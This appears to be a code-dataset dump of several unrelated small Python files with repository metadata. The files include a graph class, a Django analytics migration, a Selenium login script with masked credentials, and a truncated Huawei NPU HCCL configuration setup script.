| 27.233333 | 77 | 0.621787 | 93 | 817 | 5.16129 | 0.494624 | 0.0875 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00982 | 0.252142 | 817 | 29 | 78 | 28.172414 | 0.775777 | 0.388005 | 0 | 0 | 0 | 0 | 0.100897 | 0.056054 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.2 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aacf07f9aa6c4af097f81cc81a36e4e2404c67c | 870 | py | Python | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | """
Authors: Justin Pusztay
Filename: graph.py
Project: Research for Irina Mazilu, Ph.D.
This file contains the graph class. Allows users to build their own graph.
"""
__author__ = "\n".join(['Justin Pusztay (pusztayj20@mail.wlu.edu)'])
__all__ = ['Graph']
from Cayley.abstractnetwork import *
class Graph(AbstractNetwork):
def __init__(self):
"""Creates the graph object."""
self.keys = list()
AbstractNetwork.__init__(self)
def __eq__(self,other):
"""Need to look at Lambert's."""
if self is other:
return True
if type(self) != type(other):
return False
def nodeNumber(self):
"""Returns the total number of nodes in the Lattice."""
return len(self.graph)
def getType(self):
"""Quick fix for MonteCarlo."""
return "Graph"
| 22.894737 | 74 | 0.609195 | 105 | 870 | 4.857143 | 0.657143 | 0.05098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00316 | 0.272414 | 870 | 37 | 75 | 23.513514 | 0.802528 | 0.332184 | 0 | 0 | 0 | 0 | 0.094033 | 0.045208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aca5c7861d26f1d856b1e6a5d30cf4b942b150d | 1,215 | py | Python | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | print("copy content from auto created ex23_sample_05.txt to ex23_sample_06.txt using 1 line only")
input('In powershell: echo "This is a unicode Test." > ex23_sample_05.txt ')
in_file = open('c:\\users\\roy\\ex23_sample_05.txt', encoding = 'utf-16').read()
out_file = open('c:\\users\\roy\\ex23_sample_06.txt', 'w', encoding = 'utf-16').write(in_file)
print("DONE!\n")
#-------------------------------------------------------------------
print("-------------------------------------------------------------")
print("copy content from languages.txt within ex23 to languages2.txt using 1 line only")
in_file = open('c:\\users\\roy\\languages.txt', encoding = 'utf-8').read()
# When set encoding = utf-16 --> UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 812-813: illegal UTF-16 surrogate
# When set encoding = utf-16, errors = 'ignore' --> UnicodeError: UTF-16 stream does not start with BOM
out_file = open('c:\\users\\roy\\languages2.txt', 'w', encoding = 'utf-8').write(in_file)
# Before add encoding = utf-8 -->UnicodeEncodeError: 'gbk' codec can't encode character '\u0a73' in position 4: illegal multibyte sequence
print("DONE!\n")
# bytes can only contain ASCII literal characters. | 57.857143 | 138 | 0.642798 | 176 | 1,215 | 4.346591 | 0.454545 | 0.100654 | 0.047059 | 0.073203 | 0.224837 | 0.128105 | 0.070588 | 0 | 0 | 0 | 0 | 0.049029 | 0.110288 | 1,215 | 21 | 139 | 57.857143 | 0.658649 | 0.402469 | 0 | 0.2 | 0 | 0 | 0.638504 | 0.260388 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
8acca2171f92073439bfaa4f9dd1220f87a67e36 | 478 | py | Python | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# app.py
#
# @link https://github.com/ctlcltd/e2-sat-editor-qb
# @copyright e2 SAT Editor Team
# @author Leonardo Laureti
# @version 0.1
# @license MIT License
#
import sys
from config import *
from commons import debug
def main():
debug('main()')
if GUI_INTERFACE == 'tk':
from gui_tk import gui
elif GUI_INTERFACE == 'qt6':
from gui_qt6 import gui
if gui:
gui()
else:
debug('sys exit')
if __name__ == '__main__':
main()
| 14.058824 | 52 | 0.658996 | 71 | 478 | 4.267606 | 0.591549 | 0.033003 | 0.072607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01847 | 0.207113 | 478 | 33 | 53 | 14.484848 | 0.781003 | 0.366109 | 0 | 0 | 0 | 0 | 0.092466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | true | 0 | 0.333333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
76d561ce14f12b85a9a97f20b040313b9f2366d4 | 130 | py | Python | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | 1 | 2020-07-02T16:42:33.000Z | 2020-07-02T16:42:33.000Z | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | 138 | 2020-07-16T05:03:37.000Z | 2022-03-28T23:26:50.000Z | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | null | null | null | """Top-level package for fdf."""
__author__ = """Ledenel Intelli"""
__email__ = 'ledenelintelli@gmail.com'
__version__ = '0.1.9'
| 21.666667 | 38 | 0.692308 | 16 | 130 | 4.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0.115385 | 130 | 5 | 39 | 26 | 0.652174 | 0.2 | 0 | 0 | 0 | 0 | 0.44898 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
76dc6702762a919aace831ff2e0c72b209fd4fe4 | 324 | py | Python | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | from mycroft import MycroftSkill, intent_file_handler
class Whyplessey(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
@intent_file_handler('whyplessey.intent')
def handle_whyplessey(self, message):
self.speak_dialog('whyplessey')
def create_skill():
return Whyplessey()
| 20.25 | 53 | 0.731481 | 35 | 324 | 6.342857 | 0.542857 | 0.09009 | 0.153153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175926 | 324 | 15 | 54 | 21.6 | 0.831461 | 0 | 0 | 0 | 0 | 0 | 0.083591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0.111111 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
76e38e95db1dd82164581f6f1ccc9fa7fc3b5bb5 | 208 | py | Python | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | import b3
import unittest
class TestCondition(unittest.TestCase):
def test_category(self):
self.assertEqual(b3.Condition.category, b3.CONDITION)
if __name__ == '__main__':
unittest.main()
| 17.333333 | 61 | 0.725962 | 24 | 208 | 5.916667 | 0.625 | 0.15493 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017341 | 0.168269 | 208 | 11 | 62 | 18.909091 | 0.803468 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
76ed3de9b853ebdfc0bd75e4d1e562d796b887bf | 318 | py | Python | mocks/figures/permissions.py | appsembler/tahoe-figures | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | null | null | null | mocks/figures/permissions.py | appsembler/tahoe-figures | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | 2 | 2022-01-17T11:04:36.000Z | 2022-01-19T12:58:11.000Z | mocks/figures/permissions.py | appsembler/tahoe-figures-plugins | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | null | null | null | """
Mock for the figures.permissions model.
"""
def is_active_staff_or_superuser(request):
"""
Exact copy of Figures=0.4.x `figures.permissions.is_active_staff_or_superuser` helper.
"""
return request.user and request.user.is_active and (
request.user.is_staff or request.user.is_superuser)
| 24.461538 | 90 | 0.726415 | 46 | 318 | 4.782609 | 0.5 | 0.2 | 0.177273 | 0.136364 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007547 | 0.166667 | 318 | 12 | 91 | 26.5 | 0.822642 | 0.396226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
76fe24ea8de3050267c2d299f69c85f862b65e29 | 11,479 | py | Python | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 2 | 2018-02-07T10:26:28.000Z | 2018-09-21T09:12:58.000Z | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 5 | 2018-09-21T10:40:44.000Z | 2019-04-06T10:59:57.000Z | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 3 | 2019-06-09T15:42:02.000Z | 2022-02-14T19:50:33.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-16 13:27
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('visualizer', '0011_visualization_data_source'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('service_builder', '0024_auto_20190716_1627'),
('dashboard_builder', '0014_auto_20190716_1627'),
('aggregator', '0041_auto_20190716_1627'),
]
operations = [
migrations.CreateModel(
name='UniqueDashboardViewsView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dashboard_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_dashboard_views_view',
'managed': False,
},
),
migrations.CreateModel(
name='UniqueDatasetPreview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dataset_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_dataset_preview',
'managed': False,
},
),
migrations.CreateModel(
name='UniqueServiceUsesView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_service_uses_view',
'managed': False,
},
),
migrations.CreateModel(
name='BDO_Plan',
fields=[
('plan_name', models.TextField(primary_key=True, serialize=False)),
('plan_title', models.TextField(default='Untitled Plan')),
('query_limit', models.IntegerField(default=120, null=True)),
('price', models.FloatField(default=0, null=True)),
('access_to_beta_services', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='DashboardDisplays',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dash_display_count', models.IntegerField(default=1)),
('dashboard', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_displays_dashboard', to='dashboard_builder.Dashboard')),
],
),
migrations.CreateModel(
name='DashboardUniqueViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dash_display_count', models.IntegerField(default=1)),
('dashboard', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_unique_views_dashboard', to='dashboard_builder.Dashboard')),
('dashboard_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_unique_views_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DatasetCombined',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('combination_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_combined_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetExplored',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('exploration_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_explored_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetPageViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('preview_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_page_views_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetUniqueViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('preview_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_unique_views_dataset', to='aggregator.Dataset')),
('dataset_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_unique_views_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DatasetUseInService',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('use_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_service_dataset', to='aggregator.Dataset')),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_service_service', to='service_builder.Service')),
],
),
migrations.CreateModel(
name='DatasetUseInVisualisation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('viz_use_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_visualisation_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='MareProtectionService',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scenario', models.IntegerField(default=1)),
('simulation_length', models.IntegerField(default=24)),
('time_interval', models.IntegerField(default=2)),
('ocean_circulation_model', models.CharField(default='Poseidon High Resolution Aegean Model', max_length=100)),
('wave_model', models.CharField(default='Poseidon WAM Cycle 4 for the Aegean', max_length=100)),
('natura_layer', models.BooleanField(default=False)),
('ais_layer', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ServicePerUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service_runs', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_per_user_service', to='service_builder.Service')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_per_user_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ServiceUse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serv_use_count', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_use_service', to='service_builder.Service')),
],
),
migrations.CreateModel(
name='ServiceUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serv_use_count', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_users_service', to='service_builder.Service')),
('service_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_users_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserPlans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_start', models.DateTimeField(auto_now_add=True)),
('date_end', models.DateTimeField(default=datetime.datetime(2019, 8, 15, 16, 27, 30, 138000))),
('active', models.BooleanField(default=True)),
('auto_renewal', models.BooleanField(default=True)),
('query_count', models.IntegerField(default=0)),
('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_plan', to='website_analytics.BDO_Plan')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='VisualisationTypeUses',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('viz_use_count', models.IntegerField(default=1)),
('visualisation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_visualisation_type_uses_visualisation', to='visualizer.Visualization')),
],
),
migrations.CreateModel(
name='WaveEnergyResourceAssessment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_nester_statistics_dataset', to='aggregator.Dataset')),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_nester_statistics_service', to='service_builder.Service')),
],
),
]
| 55.723301 | 193 | 0.621308 | 1,124 | 11,479 | 6.108541 | 0.152135 | 0.026799 | 0.083746 | 0.070492 | 0.742645 | 0.685698 | 0.673755 | 0.644043 | 0.628022 | 0.605301 | 0 | 0.014001 | 0.247147 | 11,479 | 205 | 194 | 55.995122 | 0.780491 | 0.00575 | 0 | 0.563452 | 1 | 0 | 0.207888 | 0.10929 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025381 | 0 | 0.045685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a00d3d1412e7fc414904354849563644c4fd535 | 780 | py | Python | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'a login model'
__author__='Jay Gao 1219'
from selenium import webdriver;
login_url='https://www.itjuzi.com/user/login'
def login(Explorer,flag):#flag表示是否是第一次调用
if flag==False:
Explorer.find_element_by_id('loginurl').click()
pass;
else:
Explorer.get(login_url)
pass;
Explorer.implicitly_wait(30)
Explorer.find_element_by_css_selector('input[name="identity"]').send_keys("136xxxx4019")
Explorer.find_element_by_css_selector('input[name="password"]').send_keys("xxxxxxxxx")
Explorer.find_element_by_id('login_btn').click()
pass;
if __name__=='__main__':
Explorer=webdriver.Chrome();
login(Explorer,True)
print("login succeed")
Explorer.quit()
pass;
| 25.16129 | 92 | 0.691026 | 100 | 780 | 5.07 | 0.59 | 0.094675 | 0.149901 | 0.16568 | 0.252465 | 0.161736 | 0.161736 | 0.161736 | 0 | 0 | 0 | 0.022936 | 0.161538 | 780 | 30 | 93 | 26 | 0.752294 | 0.091026 | 0 | 0.181818 | 0 | 0 | 0.222222 | 0.061111 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0.227273 | 0.045455 | 0 | 0.090909 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a08ca58cb90999e2abd0782db446fdc2d440ebb | 473 | py | Python | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | 1 | 2019-12-12T15:38:42.000Z | 2019-12-12T15:38:42.000Z | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | null | null | null | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-24 09:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('publications', '0027_fill_platform_name'),
]
operations = [
migrations.AddField(
model_name='title', name='proprietary_ids', field=models.JSONField(default=list),
),
migrations.AddField(model_name='title', name='uris', field=models.JSONField(default=list)),
]
| 26.277778 | 99 | 0.663848 | 54 | 473 | 5.703704 | 0.666667 | 0.116883 | 0.149351 | 0.175325 | 0.435065 | 0.233766 | 0 | 0 | 0 | 0 | 0 | 0.053333 | 0.207188 | 473 | 17 | 100 | 27.823529 | 0.768 | 0.097252 | 0 | 0 | 1 | 0 | 0.150588 | 0.054118 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a137894f7810106cb2152e1863769e27f2e6b4c | 19,445 | py | Python | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
] | null | null | null | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
] | 1 | 2022-03-04T07:41:14.000Z | 2022-03-04T07:41:14.000Z | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import json
import time
import pdb
import platform
import string
import random
# 此脚本与create_script.sh由算法同事
# 帮忙维护,当代码变更时需更新此版本号
code_version="1.0"
def create_hccl_mindspore():
done = 0
rank_id = 0
hccl_data = {}
# for test only
#os.environ['DLWS_WORKER_NUM'] = "2"
#os.environ['DLWS_JOB_ID'] = "test_npu_device"
#os.environ['DLWS_USER_NAME'] = "bifeng.peng"
#
## 单机任务,用DLWS_PS_NUM=0判断最好
if "DLWS_WORKER_NUM" not in os.environ:
os.environ['DLWS_WORKER_NUM'] = "1"
else:
pass
worker_num = int(os.environ['DLWS_WORKER_NUM'])
job_id = os.environ['DLWS_JOB_ID']
user_name = os.environ['DLWS_USER_NAME']
# 1)hccl文件和相关脚本都会放到此目录
# 2)文件和具体的JOB有关, 不同JOB隔离存储
npu_dir = '/home/%s/.npu/%s/' % (user_name, job_id)
# 以下变量写死
hccl_data["board_id"] = "0x0020"
hccl_data["chip_info"] = "910"
hccl_data["deploy_mode"] = "lab"
hccl_data["group_count"] = "1"
hccl_data["para_plane_nic_location"] = "device"
hccl_data["para_plane_nic_name"] = [
"eth0",
"eth1",
"eth2",
"eth3",
"eth4",
"eth5",
"eth6",
"eth7"
]
hccl_data["para_plane_nic_num"] = "8"
hccl_data["status"] = "completed"
hccl_data["group_list"] = []
group = {}
group["device_num"] = str(worker_num * 8)
group["server_num"] = str(worker_num)
group["group_name"] = "test"
group["instance_count"] = group["device_num"]
group["instance_list"] = []
## 生成npu_idx.info文件
## 文件数量和worker个数一致
while True:
PATH = npu_dir + ('/npu_%d.info' % (done))
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
with open(PATH, "r") as f:
ips = ""
host_ip = ""
# 文件中的格式:
# ip=id1:ip1,id2:ip2
# host=xxx
for line in f:
print(line)
if "ip=" in line:
_, ips = line.strip().split("=")
elif "host=" in line:
_, host_ip = line.strip().split("=")
ip_list = ips.split(",")
ip_list = sorted(ip_list)
for ip_elem in ip_list:
# 设备id和ip
device_id, device_ip = ip_elem.split(":")
## set up group list
device_item = {} # item of instance list
device_item["devices"] = [{
"device_id" : device_id,
"device_ip" : device_ip
}]
device_item["rank_id"] = str(rank_id)
device_item["server_id"] = str(host_ip)
#pdb.set_trace()
rank_id = rank_id + 1
group["instance_list"].append(device_item)
f.close()
done = done + 1
else:
pass
if done == worker_num:
break
else:
pass
time.sleep(1)
group["instance_count"] = group["device_num"] = str(len(group["instance_list"]))
print("succ!")
hccl_data["group_list"].append(group)
# dump to json file
with open(npu_dir + '/hccl_ms.json', 'w') as fp:
json.dump(hccl_data, fp)
return
def create_hccl_tensorflow():
done = 0 # worker node to process
rank_id = 0 # equals to device count
hccl_data = {}
# for test only
#os.environ['DLWS_WORKER_NUM'] = "2"
#os.environ['DLWS_JOB_ID'] = "test_npu_device"
#os.environ['DLWS_USER_NAME'] = "bifeng.peng"
#
## non distributed job
if "DLWS_WORKER_NUM" not in os.environ:
os.environ['DLWS_WORKER_NUM'] = "1"
else:
pass
worker_num = int(os.environ['DLWS_WORKER_NUM'])
job_id = os.environ['DLWS_JOB_ID']
pod_name = os.environ['POD_NAME']
user_name = os.environ['DLWS_USER_NAME']
distributing_job= False
if "DLWS_NUM_PS" in os.environ:
if int(os.environ["DLWS_NUM_PS"]) > 0:
distributing_job = True
else:
pass
else:
pass
# 1)hccl文件和相关脚本都会放到此目录
# 2)文件和具体的JOB有关, 不同JOB隔离存储
npu_dir = '/home/%s/.npu/%s/' % (user_name, job_id)
